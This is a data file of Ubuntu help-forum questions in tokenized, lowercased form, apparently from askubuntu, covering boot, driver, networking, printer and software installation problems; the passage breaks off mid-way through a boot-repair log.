412410	ca n't access bios and installing a windows hard drive	built new computer : amd fx-8320 eight-core processor ă 8 9.7 gib ram graphics geforce gtx 650 ti boost/pcie/sse2 ubuntu 13.10 64-bit desktop computer 1 tb harddrive bios type , uefi bios loaded first time i started up , configured . then i ran the ubuntu cd i made . installed , then all good . now , i realized i can not access the bios , at all , even when no hard drives are connected . i am pressing the right button , del . i have tired all the other keys on my keyboard , i know that is not the problem . other problem is that i took a hard drive with windows 7 on it from another computer , and put it in mine ( yes i installed it correctly ) . grub does not detect it . i have updated grub , used boot fixer , and a lot of other stuff . i think the key lies in the bios , if i could get to it , i think i could fix it myself
412415	setting up a local repository : need help	i am attempting to set up a local ubuntu repository following this , but i need some help . to test if i did everything correctly , i tried sudo apt-get install chrome or sudo apt-get install nodejs but i get unable to locate package x . since i followed the official documentation linked above precisely , i am not sure what i am doing wrong . why do people suggest using apt-mirror or apt-catcher ? are they necessary ? do i have to unzip packages.bz2 or packages.gz ? is it right that i just leave them as they are ? am i missing an important step ? i have n't figured out a solution after doing some research . any help would be appreciated .
412417	just installed ubuntu 12.04.3 - xterm xt error ca n't display	i am new , just installed ubuntu and trying to see the output of commands . i ca n't open/do n't know how to open a terminal window . i have a screen shot if needed . ! [ enter image description here ] [ 1 ]
412419	python module pybluez error	i 'm running ubuntu 13.04 server on a mac os x ( maverick ) and python 2.7.5 . i installed pybluez and bluez-libs . when i type import bluetooth or from bluetooth import * it successfully imports but when i try to run a basic script using the discover_devices ( ) method , i get this error traceback ( most recent call last ) : file `` ./fin.py '' , line 4 , in < module > devlist = discover_devices ( ) file `` /usr/lib/python2.7/dist-packages/bluetooth/bluez.py '' , line 17 , in discover_devices sock = _gethcisock ( ) file `` /usr/lib/python2.7/dist-packages/bluetooth/bluez.py '' , line 226 , in _gethcisock raise bluetootherror ( `` error accessing bluetooth device '' ) bluetooth.btcommon.bluetootherror : error accessing bluetooth device and when i type ~ $ hcitool dev no devices are named . any ideas ? thanks in advance .
412422	installing condor	can someone please tell me how to install condor on ubuntu 12.04 ? i do not know the commands for installing it . i have downloaded condor-8.1.3-x86_64_ubuntu12-unstripped . please help .
412424	dell wireless wlan 1520 half minicard driver 12.04	bear with me , i am not completely retarted , but i can not find the driver for my dell wireless wlan 1520 half minicard driver . this is an inspiron mini 1010 . any suggestions ? thanks in advance ~aurora 313
412426	ubuntu keyboard issue [ mac ]	i was running os x mavericks and i wanted to try out ubuntu ... it worked just fine until i rebooted and could n't use the arrow keys on my apple bluetooth keyboard to select os x from the dual boot loader ! now i cant even go back onto os x and im stuck on ubuntu ! please help asap !
412427	how can i restore my previous windows boot manager after using boot-repair ?	i installed ubuntu 12.04 lts on my windows 8 laptop following these steps : created a separate partition in windows ( 30 gb ) disabled safe boot in bios ( boot mode is uefi ) launched ubuntu from the 12.04 lts live cd and used the `` try '' option launched the installation from within the live cd selected the 30gb free space and creates a swap partition , then a linux / partition installed 12.04 on the / partition restarted the laptop . it was booting on windows 8 only launched ubuntu from the live cd downloaded and installed boot-repair launched boot-repair and selected the `` create a boot info summary '' selected the recommended repair option . i got a message saying that efi was enabled ( i want to use efi ) . clicked ok. got a question asking about creating back up files ( do n't remember exact ) . i answered yes . after repair was completed i obtained http : //paste.ubuntu.com/6835758 reboot windows does no longer boot . i get a quick error ( can not read it ) a scrambled page and after waiting a while ubuntu will start . regression : i went into bios and enabled `` safe boot '' - > same behaviour . disabled `` safe boot '' again . i see that in my boot menu i now have a new entry for ubuntu right after the windows boot manager . how can i restore my previous windows boot manager ?
412429	mongodb installation failing	i am following te simple steps to install mongodb : first : apt-key adv -- keyserver keyserver.ubuntu.com -- recv 7f0ceb10 worked good second : echo `` deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen '' | tee -a /etc/apt/sources.list.d/10gen.list deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen done third : apt-get -y update done fourth : apt-get install mongodb-10gen but this step failed with following message : failed to fetch http : //downloads-distro.mongodb.org/repo/ubuntu-upstart/dists/dist/10gen/binary-amd64/mongodb-10gen_2.4.9_amd64.deb size mismatch i am not able to get what am i doing wrong as i have been following these steps for a while and they were successful .
412430	create drop down menu in eclipse kepler	i have problem to get the drop down menu in my eclipse . i have reviewed the solution in other q & a threads , like this and this ( being the most 2 helpful one ) . after following the instruction , i am able to get eclipse with drop down menu , but only when i access it with nautilus ( root access ) . without root access , i am not able to get the drop down menu at all . i download my eclipse from the website , and the path to eclipse is /usr/local/ . here how my eclipse.desktop look like this : [ desktop entry ] type=application name=eclipse comment=eclipse integrated development environment icon=eclipse exec=env ubuntu_menuproxy= usr/local/eclipse terminal=false categories=development ; ide ; java ;
412433	remote desktop connection getting black from ubuntu 13	i have installed xrdp in ubuntu and while i try to connect the remote desktop from windows 7 to the ubuntu machine , the session is being connected but all i am seeing is a full black screen . kindly help me to fix this issue .
412437	`` ls '' is not listing any user 's under /home directory in ubuntu	am very new to ubuntu and i got a machine which was used by some one before . now i do n't know how to recover login credentials . i tried to enter to root and tried to see the user names . i used ls /home , but am not seing any users or names displayed . anyone has any idea about this ?
412440	how to fix : too short external monitor 's resolution after hdmi reconnect until reboot ?	is there a way to force the system to always set the same resolution for specific display regardless to anything ? i am working on a notebook with external monitor via hdmi and experiencing the same problem each day - in one specific case the external monitor 's resolution is not set correctly - gets 1600x1200 instead of 1920x1200 and ca n't be picked from gui , but the correct max resolution is shown in amd control center - yet as an information only . after a reboot with connected monitor it is okay , but when i reconnect the monitor on a suspended the system - the problem appears . it is ok as long as i reconnect the monitor on awaken system , but that 's poor reason to wake the system up when i want disconnect the monitor and later have appropriate resolution , when i connect it back .
412441	icon only taskbar applet in cinnamon	i have installed the cinnamon applet icon only taskbar in my ubuntu to make the taskbar feature like that of windows 7 . but there is a number displayed above the taskbar icons to indicate the number of opened windows . anybody know how to hide this number ?
412442	can not create hadoop cluster	i have installed hadoop inside /usr/local/hadoop/bin directory and when i try executing the bash script start-all.sh ; system gives below error ; start-all.sh : command not found also i don ; t see stopall.sh , start-dfs.sh , stop-dfs.sh , start-all.sh , stop-all.sh under usr/local/hadoop/bin folder . it does n't have /usr/local/hadoop/conf/hadoop-env.sh file , so i created hadoop-env.sh file and i set the java home env variable as ; the java implementation to use . required . export java_home=/usr/lib/jvm/java-6-sun
412444	installing ruby on rails on ubuntu using vmware	rvm install 1.8.7 while i am trying to use above command error is occurred . error : error running 'bunzip2 ' < 'usr/share/ruby-rvm/archives/ruby-1.8.7-p334.tar.bz2 | tar xf - -c /usr/share/ruby-rvm/tmp/rvm_src_3889 ' , please read usr/share/ruby-rvm/log/ruby-1.8.7-p334/extract.log error : there has been an error while trying to extract the source . halting the installation . error : there has been an error fetching the ruby interpreter . halting the installation . while i am using this command read /usr/share/ruby-rvm/log/ruby-1.8.7-p334/extract.log it does n't display any information . can any one help me to solve this problem ?
412446	can anyone tell me how to play ps3 games on ubuntu	i have just started using ubuntu 12.04 and i was wondering whether i can play ps2 or ps3 games on ubuntu . please help if its possible . thanks
412450	draftsight problems with draft area	i have a problem after installing drafsight v1r5 on ubuntu 12.04 . ( 64bit ) the draft area is grey coloured and i ca n't see anything in it . my computer : dell 5537 graphic card amd radeon graphic driver for 2d : ati/amd proprietary fglrx graphics driver ( experimental beta ) i have dowloaded from `` additional drivers '' . what can i do to fix it ? to install draftsight i followed all steps in this guide .
412451	how to remote desktop into server gui without logging into the console beforehand	ok so i want to use something like vnc or rdp to connect to my ubuntu 12.04 server after it has booted up and is displaying a login prompt without having to go to the console and actually log in at the console first . i do n't need to see the login screen that the console displays , but once it connects i 'd like to be able to use the full desktop gui . this will be for admin management of the server , so it is ok if there is a single user/password for this access . it does n't need to provide multiple concurrent access either , though that would be nice . the machine was installed choosing `` minimal '' then running the commands sudo apt-get install aptitude sudo aptitude install screen openssh-server sudo aptitude install -- no-install-recommends ubuntu-desktop landscape-client-ui-install sudo aptitude install indicator-application indicator-appmenu indicator-datetime indicator-session indicator-sound unity-lens-applications unity-lens-files xdg-utils now what ? i 've tried vino ( aka `` desktop sharing '' ) seems to require that someone already be logged in to the server before it can be used . tightvncserver says it can be run from the command line , but i must have been doing it wrong . xrdp looks promising but just presents me with a blank window instead of a desktop when i log in x11vnc with xvfb is complex and i only managed to create a vnc session from the ssh console of a terminal console . again , i seem to be missing something as there surely is a way , and possibly with the tools i 've already tried .
412452	getting hybrid graphics to work nvidia-prime gt650m	i recently made the switch to ubuntu . everything on my laptop works fine except my hybrid graphics card . it is intel graphics combined with nvidia geforce gt650m . i tried bumblebee , but primusrun does n't work ( segmentation fault , core dumped ) and optirun works with glxspheres64 , but steam games look worse with optirun than with intel graphics ( e.g . surgeon simulator 2013 runs fine with intel and hangs a lot with optirun ) i tried nvidia prime , but it gives me a black screen on startup after install , so i ca n't do anything and have to power off my pc with the power button . i also tried nvidia-prime 0.5 on ubuntu 14.04 , and then i get 'low-graphics mode ' and i ca n't get to unity .
412454	networked epson workforce 600 adusting print quality 12.04lts	so i 'm able to print on my networked printer , but i need to be able to print on a higher image quality ( or adjust dpi ) . reason is my printer fails nozzle checks and header cleaning only waste ink , but on windows 7 i can adjust the print quality to either best and above and the quality looks fine , on normal i get the same results as ubuntu , dotted lines galore . any ideas ? epson workforce 600 12.04 32-bit
412455	viewing files from a windows ddrescue image	i recently used ddrescue to image a failing 1tb drive /dev/sdb to an image file on /media/tuxbox/ ... /rescued_1tb_image.img i am currently having issues mounting this image file because it may contain more than 1 partition , i think . the drive that failed was running windows 8 , so i only assume it was a ntfs drive especially since i know it contained files as large as 10gb . tuxbox tuxbox # mount -t ntfs /media/tuxbox/save\ me\ silver/silver_friday_night_try/rescued_1tb_image.img /media/seagate_silver/ ntfs signature is missing . failed to mount '/dev/loop0 ' : invalid argument the device '/dev/loop0 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? in frustration i also tried mounting as a vfat - and was not getting anywhere with that either ... . tuxbox tuxbox # mount -t vfat /media/tuxbox/save\ me\ silver/silver_friday_night_try/rescued_1tb_image.img /media/seagate_silver/ mount : wrong fs type , bad option , bad superblock on /dev/loop0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so tuxbox tuxbox # dmesg | tail [ 30.872405 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 30.872592 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 31.992790 ] e1000e : eth1 nic link is up 100 mbps full duplex , flow control : rx/tx [ 31.992794 ] e1000e 0000:00:19.0 eth1 : 10/100 speed : disabling tso [ 31.992823 ] ipv6 : addrconf ( netdev_change ) : eth1 : link becomes ready [ 222.431355 ] kjournald starting . commit interval 5 seconds [ 222.431935 ] ext3-fs ( sdd1 ) : using internal journal [ 222.431942 ] ext3-fs ( sdd1 ) : mounted filesystem with ordered data mode [ 1891.527112 ] fat-fs ( loop0 ) : bogus number of reserved sectors [ 1891.527121 ] fat-fs ( loop0 ) : ca n't find a valid fat filesystem i also tried using gparted to find out what partitions are on this image file and i came to another halt . tuxbox tuxbox # parted /media/tuxbox/save\ me\ silver/silver_friday_night_try/rescued_1tb_image.img unit s print error : /media/tuxbox/save me silver/silver_friday_night_try/rescued_1tb_image.img : unrecognised disk label
412456	sharing a dial-up connection from ubuntu 12.04 to another on a lan	i need to share the dial-up connection from my ubuntu machine to another locally connected machine . lan ip of my client is 192.168.0.2 . please help me to solve this issue .
412460	lenovo 's disable touchpad button not working	so i have a lenovo u310 with ubuntu 13.10 on it and whenever i try to disable my touchpad with the special button on my f6 key , it does nothing . all the other special keys work , like plane mode and refresh page but only the touchpad button is not working . what might be wrong with it ?
412461	quiet hissing out of audio	this is not a duplicate , from what i 've found . basically , a very quiet ( but very noticeable with nice headphones ) white noise/hiss is emitted . i 'm on the latest version 13 . here 's what i 've found : alsamixer does nothing when i mute the speakers , the sound goes away the noise starts right before the gui to login appears on bootup . when i unplug the machine , the white noise will stop unless i am playing something , in which case it will have white noise until a few seconds after the music stops , and it 'pops ' off . this did n't happen with windows 8 . i believe it 's been happening since the clean ubuntu install . turning volume up/down does n't affect white noise volume . only muting completely eliminates . please help a guy out . : - ( this is make-or-break for ubuntu ... i need my music !
412462	ubuntu 13.10 access ntfs partitions with providing root password ?	i have ubuntu and windows 8.1 on my laptop . each time i access the ntfs partition , the system does not ask me for root password . and i do n't like this . is it possible to ntfs partitions only if i provide the root password ?
412463	instead of booting up , ubuntu shutdown if it was scheduled to shutdown while the lid is closed	i sometimes use wget or any other tool to download big files or a number of big files with take time . so i run the following commands sudo su wget http : //bigfile ; wget http : //bigfile ; wget http : //bigfile ; shutdown -p now after running these commands , i close the laptop 's lid . after ubuntu shuts down , if i boot it again , it shows the ubuntu loading screen ( called plymouth i think ? ) , then it shuts down ! so i have to boot it up again . why is that and how to fix this ? my laptop is dell inspiron se 7520
412466	how to separate installed packages based on their installation type ?	consider a case that i have few list of packages installed in my ubuntu . among them few are installed from apt-get , aptitude & few from source tars . how can i group them separately based on their installation process . thank you .
412467	how can i install different versions of php in xampp	i installed the latest version of xampp i.e . 1.8.3-2 in ubuntu 12.04 . i found that it include php 5.5.6 and i want the lesser php version to work on my site . how can i install the new version or multiple version in xampp so that my site can work . i am working on magento and it does not support php 5.5 so any idea how can i do this . thanks
412469	why does n't my policykit localauthority file allow me to use cpufreq-set ?	i 'm trying to configure xubuntu 13.10 ( saucy ) in such a way that i can change the cpu governor and maximum frequency ( using cpufreq-set ) without sudo . i created an /etc/polkit-1/localauthority/50-local.d/org.gnome.cpufreqselector.pkla file with the following contents : [ cpu frequency governor ] identity=unix-user : myusername action=org.gnome.cpufreqselector resultactive=yes resultany=yes resultinactive=yes yet , even after rebooting and logging back in as myusername , cpufreq-set -- max 1ghz fails with exit code 218 . ( the same command works fine as root . ) i 've tried it from a text console , from an x terminal , and from within an xfce panel widget , all with the same failure . i 've tried a few different resultactive/resultany/resultinactive combinations in that file , but they did n't make a difference . i 've tried relocating the file to the /var/lib/polkit-1/localauthority/50-local.d/ directory , but it did n't help . both polkitd and polkit-gnome-authentication-agent-1 are running . can someone tell me why this is n't working ? i have n't found any documentation on exit code 218 ; can someone tell me what it means ?
412472	how to fix : flash playing a video does n't cancel display suspention ?	update for ubuntu 14.04 , fglrx-updates and newest chrome / flash , the problem does not affect youtube , just videos played by other flash players . current & no like : screen gets suspended regardless to firefox / chrome flash video being played at the time . desired & like : screen suspension is canceled while flash video is playing . so far it seems as a flash issue , but maybe i can fix that by changing screensaving program ? ubuntu 12.04 lts precise wow , there is chrome about : flash ! google chrome 35.0.1916.153 ( ) flash plugin 14.0.0.125 /opt/google/chrome/pepperflash/libpepflashplayer.so [ some crashes ] warning : gpu access is not allowed : gpu access is disabled in chrome : //setting oh , and all flags have default settings . about gpu process - it crashes some time after chrome startup . flash video and webgl , gpu process works at first - about : gpu mostly green hardware accelerated but then it gets red and not hw accelerated , do n't know why and when exactly . : (
412477	mount remote directory using ssh	how to mount a remote directory using ssh to be available same as if it is a local directory ?
412479	425 security : bad ip connecting . vsftpd	i found out what was wrong i just needed to move the pasv_promiscuous=yes from the bottom to the top . i dont know why it worked i 'm using vsftpd and when i try to connect to the ftp server it logins but then the server respons is 425 security : bad ip connecting . and this is my /etc/vsftpd.conf file listen=yes anonymous_enable=no local_enable=yes write_enable=yes local_umask=022 nopriv_user=vsftpd virtual_use_local_privs=yes guest_enable=yes user_sub_token= $ user local_root=/var/www/sites/ $ user chroot_local_user=yes hide_ids=yes guest_username=vsftpd i have tried to insert this line pasv_promiscuous=yes but then then i could not connect at all please help -viktor strate
412481	libreoffice impress document 's footer	can you help me please ? i have following problem . i want to use custom property ( file- > properties- > custom properties ) of libreoffice impress document as footer text ( my_company_name + slide no : + copyright text ) on every slide . my actual task is to ask `` footer text '' in vb dialog box by user at a time of document creation . i am able to set a custom property by macro sub . but unable to insert it as footer on every slide . when i create document then footer shows on each slide but , on adding new slide , there is no footer on new one . please help for this problem . thanks in advance .
412484	hdmi extension not working properly in hp - envy laptop	i am trying to extend the screen . i am using hp-envy m6 laptop , when i am connecting my hdmi cord , to my television , the screen is not properly adjusted . also on moving mouse the display starts to break , plus no matter on which thing i click , it does n't work .
412486	will i lose my data in other partitions when i install ubuntu alongside windows ?	i want to use both ubuntu and windows7 as dual booting , so please let me know because i had already lost data when i installed ubuntu as replace widows 7 with ubuntu , so i do n't want to lose again .
412491	i have a larger screen attached to my laptop	i have a larger screen attached to my laptop , which is a toshiba , when i close the lid both screens close into sleep mode , what command do i use to stop this . i am a new user on ubuntu 13.10 , i am also new to linux os . with thanks pietboks
412492	slow ethernet upload after upgrade to kernel 3.11.0-15-generic	i have upgraded ubuntu 13.10 with the most recent packages offered , including kernel 3.11.0-15-generic . i have gigabit lan and i noticed that when i uploading large files ( ~2-4gb ) to my ubuntu `` nas '' , the upload speed is very bad ( 8-9mb/s ) . before upgrade of the kernel it used to be ~50mb/s . i made several tests , but the result was still very slow upload . download speeds are fine - ~50mb/s i booted from ubuntu 13.10 live usb - upload speed was good there - ~50mb/s ( there was 3.11.0-12-generic kernel ) . then i booted my linux with selecting older kernel 3.11.0-12 in grub menu . -- > with this kernel the upload and download speeds are fast - ~50mb/s . so i assume the problem is in the kernel 3.11.0-15 . i have this ethernet controller : ethernet controller : qualcomm atheros ar8151 v2.0 gigabit ethernet ( rev c0 ) using this module : atl1c any ideas what 's wrong with the new kernel ? thx
412495	setlocale : lc_ctype : can not change locale ( utf-8 )	when i press tab for autocompletion i get this error : -bash : warning : setlocale : lc_ctype : can not change locale ( utf-8 ) i 've tried running this : locale-gen en_us en_us.utf-8 dpkg-reconfigure locales reboot but it does n't help . do you know what is missing ? i 'm running ubuntu 13.04 .
412498	rsyslog.conf only partly honored	i followed this description on how to enable audit for samba ( entry of aug 10 , 2009 ) and wanted to get all additionally enabled logging in a special log file ( /var/log/samba/log.audit ) . the mentioned line local7 . * /var/log/samba/log.audit i placed at the end of my existing /etc/rsyslog.conf file . it seemed a bit out of place there , but after restarting everything , the mentioned file was created , presumably by the syslog daemon , so i assumed this was working . but it stayed at a size of 0 bytes . after creation of the file , nothing was logged there . it took me some time but then i found that all logging was done into the default syslog file ( /var/log/syslog ) . i guess the config line in /etc/rsyslog.conf is correct , but somehow the way it was supposed to be addressed in the /etc/samba/smb.conf is not working . i repeat in short what the blog above suggested to do : add the lines vfs objects = full_audit full_audit : prefix = % u| % i| % m| % s full_audit : success = mkdir rename unlink rmdir pwrite full_audit : failure = none full_audit : facility = local7 full_audit : priority = notice to the existing smb.conf and add the line local7 . * /var/log/samba/log.audit to the syslog.conf ( i took my existing /etc/rsyslog.conf for this ) . can anybody tell me how to fix this so that the logging is done into the intended file /var/log/samba/log.audit ?
412499	gnuplot 4.6.4 in ubuntu 12.04	i tried to install gnuplot-4.6.4 in ubuntu 12.04 after following http : //priyansmurarka.wordpress.com/2013/07/02/gnuplot-on-ubuntu-12-04/ but it gave following error after sudo make in file included from wxterminal/wxt_gui.cpp:96:0 : wxterminal/wxt_gui.h:161:3 : error : # error `` wxt does not know if this platform has to be mono- or multi-threaded '' wxterminal/wxt_gui.cpp : in function ‘bool wxt_exec_event ( int , int , int , int , int , wxwindowid ) ’ : wxterminal/wxt_gui.cpp:3331:7 : error : ‘wxt_sendevent_fd’ was not declared in this scope wxterminal/wxt_gui.cpp:3336:13 : error : ‘wxt_sendevent_fd’ was not declared in this scope wxterminal/wxt_gui.cpp : in function ‘void wxt_atexit ( ) ’ : wxterminal/wxt_gui.cpp:3593:34 : warning : ignoring return value of ‘file* freopen ( const char* , const char* , file* ) ’ , declared with attribute warn_unused_result [ -wunused-result ] wxterminal/wxt_gui.cpp:3594:34 : warning : ignoring return value of ‘file* freopen ( const char* , const char* , file* ) ’ , declared with attribute warn_unused_result [ -wunused-result ] how to install it ?
412501	canon laser jet printer 2900 lbp successfully install in ubuntu 12.04 desktop but after reboot it does not work why ?	we are using ubuntu 12.04 desktop version working fine . we also have many canon laser jet printer 2900 lbp which we want to use on ubuntu . i am facing some problem in the same regards as below- i have installed printer driver with the following command and package- packages are- cndrvcups-common_2.60-1_i386.deb ( first ) cndrvcups-capt_2.60-1_i386.deb 1 ) step i took is : - sudo mkdir /var/ccpd sudo mkfifo /var/ccpd/fifo0 sudo mkdir /var/captmon 2 ) step to register the printer : sudo /usr/sbin/lpadmin -p lbp2900 -m cncupslbp2900captk.ppd -v ccp : /var/ccpd/fifo0 -e 3 ) step to register the printer with ccpd daemon : sudo /usr/sbin/ccpdadmin -p lbp2900 -o /dev/usb/lp0 4 ) step to start ccpd daemon : sudo /etc/init.d/ccpd start 5 ) verify service status sudo service ccpd status /usr/sbin/ccpd : 1245 1141 [ here showing two process ) 5 ) step to make ccpd service available after reboot sudo update-rc.d ccpd start *after doing above printer start working but after restart the computer it does not work and show only one process if i check the status of ccpd service sudo service ccpd status /usr/sbin/ccpd : 1245 [ only one process after reboot ) if have to take print out then i need to execute following command after restart that i observed as given below- sudo /etc/init.d/ccpd stop sudo /usr/sbin/ccpdadmin -p lbp2900 -o /dev/usb/lp0 sudo /etc/init.d/ccpd start i f i check the status of ccpd service sudo service ccpd status /usr/sbin/ccpd : 1245 1141 [ here showing two process ) mean ok please help me overcome this problem so that i do n't need to execute the command again and again after restart the computer i also have done this using cron and startup script but it does not work till i execute the same command thanks ravindra kumar ravi6983 @ gmail.com
412503	ssh log login attemtp details	i my office we are using ubuntu server 12.04 . i have installed ssh server in it for clients to access through putty . now i need to track the users login details like ip address , hostname and date of login . is that possible to trace those information , and if so how ?
412504	installing multiple linux distribution on usb flash drive	is it possible to install multiple linux distros on usb pendrive and use on it ext4 file system and grub2 ? i do n't want to use any automatic tools like ubuntu usb creator or multibootusb . i want to do it by myself .
412507	after install next to windows 8 , no grub , windows 8 still booting	i have a pc running windows 8.1 on a first ssd . i bought a second ssd and installed ubuntu 13.10 on it . the installation completed , even though at some point it stated that no other os were previously installed -- not sure if that 's a problem . i specified the first disk ( the one with windows ) as the disk to place the boot sector . after installation , there was no grub menu , and windows starts . i used a grub recovery disk which i used in the past to reinstall grub after a windows reinstall . it completed successfully ( recognizing windows this time ) putting boot sector on both disks . however , the behavior did n't change : no grub menu , and windows starts . repair info follows in case it might help . boot info script 0.60-git [ 2 jan 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . = > no boot loader is installed in the mbr of /dev/sdc . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe sdb1 : __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.04 2011-04-18 boot sector info : syslinux looks at sector 1849120 of /dev/sdb1 for its second stage . syslinux is installed in the directory . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /syslinux/syslinux.cfg /ldlinux.sys sdc1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.10 boot files : /boot/grub/grub.cfg /etc/fstab ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 718,847 716,800 7 ntfs / exfat / hpfs /dev/sda2 718,848 488,394,751 487,675,904 7 ntfs / exfat / hpfs drive : sdb _____________________________________________________________________ disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 32 62,530,623 62,530,592 c w95 fat32 ( lba ) drive : sdc _____________________________________________________________________ disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 1 234,441,647 234,441,647 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sdc1 2,048 234,440,703 234,438,656 data partition ( linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 78a05ce4a05caa80 ntfs réservé au système /dev/sda2 1c0a5dd60a5dad90 ntfs /dev/sdb1 c079-9c1a vfat mylinuxlive /dev/sdc1 adc402a7-f70c-4ef7-94ec-d36c1846103a ext4 ================================ mount points : ================================= device mount_point type options /dev/sdb1 /media/mylinuxlive vfat ( rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush ) /dev/sr0 /live/image iso9660 ( ro , noatime ) =========================== sdb1/boot/grub/grub.cfg : =========================== [ edited ] ========================= sdb1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 50 ui gfxboot bootlogo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ? ? = ? ? boot/grub/grub.cfg 1 ================= sdb1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/chain.c32 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sdb1 : version of com32 ( r ) files used by syslinux : =============== syslinux/chain.c32 : com32r module ( v4.xx ) syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) =========================== sdc1/boot/grub/grub.cfg : =========================== [ edited ] =============================== sdc1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdb1 during installation uuid=adc402a7-f70c-4ef7-94ec-d36c1846103a / ext4 errors=remount-ro 0 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdc1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ? ? = ? ? boot/grub/grub.cfg 1 ? ? = ? ? boot/initrd.img-3.11.0-12-generic 2 ? ? = ? ? boot/initrd.img-3.11.0-15-generic 1 ? ? = ? ? boot/vmlinuz-3.11.0-12-generic 1 ? ? = ? ? boot/vmlinuz-3.11.0-15-generic 1 ? ? = ? ? boot/vmlinuz-3.11.0-15-generic.efi.signed 1 ? ? = ? ? initrd.img 2 ? ? = ? ? vmlinuz 1 =============================== stderr messages : =============================== file descriptor 7 ( pipe : [ 5552 ] ) leaked on lvscan invocation . parent pid 8592 : bash file descriptor 8 ( pipe : [ 5552 ] ) leaked on lvscan invocation . parent pid 8592 : bash no volume groups found mdadm : no arrays found in config file or automatically additional information : **************** log of boot-repair 2014-01-28__21h42 **************** boot-repair version : 3.16-0ppa2~lucid boot-sav version : 3.17-0ppa4~lucid g2s version : 0.3.01.1-0ppa1~lucid internet : no-internet internet : no-internet file descriptor 7 ( pipe : [ 5552 ] ) leaked on lvs invocation . parent pid 3223 : /bin/sh file descriptor 8 ( pipe : [ 5552 ] ) leaked on lvs invocation . parent pid 3223 : /bin/sh no volume groups found livesession is : yes ( debian gnu/linux 6.0.3 ( squeeze ) , squeeze , debian , x86_64 ) bytes_before_part [ 1 ] ( sda ) = 2048 sectors * 512 bytes = 1048576 bytes . bytes_before_part [ 2 ] ( sdc ) = 2048 sectors * 512 bytes = 1048576 bytes . bytes_before_part [ 3 ] ( sdb ) = 32 sectors * 512 bytes = 16384 bytes . osprober : /dev/sda1 : windows recovery environment ( loader ) : windows : chain /dev/sdc1 : ubuntu 13.10 ( 13.10 ) : ubuntu : linux blkid : /dev/sda1 : label= '' rm-cm- ) servm-cm- ) au systm-cm- ( me '' uuid= '' 78a05ce4a05caa80 '' type= '' ntfs '' /dev/sda2 : uuid= '' 1c0a5dd60a5dad90 '' type= '' ntfs '' /dev/sdc1 : uuid= '' adc402a7-f70c-4ef7-94ec-d36c1846103a '' type= '' ext4 '' /dev/sdb1 : label= '' mylinuxlive '' uuid= '' c079-9c1a '' type= '' vfat '' /dev/loop0 : type= '' squashfs '' 2 disks with os , 2 os : 1 linux , 0 macos , 1 windows , 0 unknown type os . total of 1 os detected on sda disk . total of 1 os detected on sdc disk . warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . list_gptpart [ 1 ] is 3 ( sdc1 , sdc ) table_type of sda is msdos readefi : /dev/sdc , n 128 , 0 , , prstart 1024 , prsize 128 part /dev/sdc1 is notbisefi table_type of sdc is efi table_type of sdb is 